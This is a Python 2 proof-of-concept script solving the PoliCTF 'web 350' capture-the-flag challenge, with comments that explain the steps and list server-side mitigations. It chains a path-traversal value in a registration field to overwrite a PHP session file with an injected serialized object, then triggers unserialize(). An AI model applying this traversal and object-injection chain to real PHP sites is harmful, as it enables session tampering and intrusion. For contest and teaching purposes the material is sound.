web 350
# Proof-of-concept for the PoliCTF "web 350" challenge, written for Python 2
# (print statement, raw_input); it will not run unchanged under Python 3.
# Two server-side weaknesses are chained, going by the requests and the
# author's notes below: the `surname` field apparently ends up in a file path
# without normalisation, so registering a user can write attacker-controlled
# bytes into a PHP session file, and magic_things.php then passes that session
# data to unserialize(). Server-side mitigations for this class of bug: never
# build file paths from user input (normalise and whitelist, reject ".."), and
# never unserialize() data the client can influence.
import requests
import random
import string
# Base URL of the challenge host.
URL = 'http://magic.polictf.it/'
# Random 10-letter account name for the throw-away user.
name = ''.join(random.sample(string.ascii_letters, 10))
# Fixed PHPSESSID; the session file named after it is the write target
# (see the `surname` value in step 2).
sessid = 'trbfs2mbi41lmeg32439vu1gb4'
'''
# 1. binding the user and session which make isLogged() checking in 'magic_things.php' passed.
# It does not needed.
# Because even if isLogined() check fail,
# it will still execute the rest of code which is include 'unserialize()'.
r = requests.post(
URL + 'index.php',
params = {'page': 'register'},
data = {
'name': name,
'surname': name,
'username': name,
'password': name,
'register': 'send'
}
)
print 'register', 'ok, now u can log in' in r.text
r = requests.post(
URL + 'index.php',
data = {
'username': name,
'password': name,
'login': 'login'
},
cookies = {
'PHPSESSID': sessid
}
)
print 'login', 'magic_things.php' in r.text
print r.text
print 'stage1 done'
raw_input()
'''
# 2. Register a second user and log it in; per the author, the login path
#    opens the "log" file with fopen(..., "w+"), and because `surname` points
#    at our session file, that write overwrites the session with the injected
#    content.
name2 = name + '_write'
r = requests.post(
URL + 'index.php',
data = {
# Injected session content. The leading `s:0:"";` is meant to close off
# whatever the server writes before this value (author's note: "fixing the
# user field"), after which `user` and `userObject` (a serialized Magic
# object) are supplied as ordinary session keys.
'name': 's:0:"";user|s:%d:"%s";userObject|s:16:"O:5:"Magic":0:{}";' % (len(name), name),
# Path-traversal value: resolves to the PHP session file for `sessid`.
'surname': '/../../tmp/sess_' + sessid,
'username': name2,
'password': name2,
'register': 'send'
}
)
print 'register', 'ok, now u can log in' in r.text
# Logging in as the new user triggers the server-side write to the session file.
r = requests.post(
URL + 'index.php',
data = {
'username': name2,
'password': name2,
'login': 'login'
}
)
print 'login', 'magic_things.php' in r.text
print 'stage2 done'
# 3. Trigger unserialize() on the overwritten session.
r = requests.get(
URL + 'magic_things.php',
params = {'logout': 'true'},
cookies = {
'PHPSESSID': sessid
},
# The failed login check answers with a redirect, but (per the author) the
# page still runs unserialize() and emits its output in that response body.
# Disabling redirect-following keeps that body instead of the redirect target.
allow_redirects=False
)
print r.text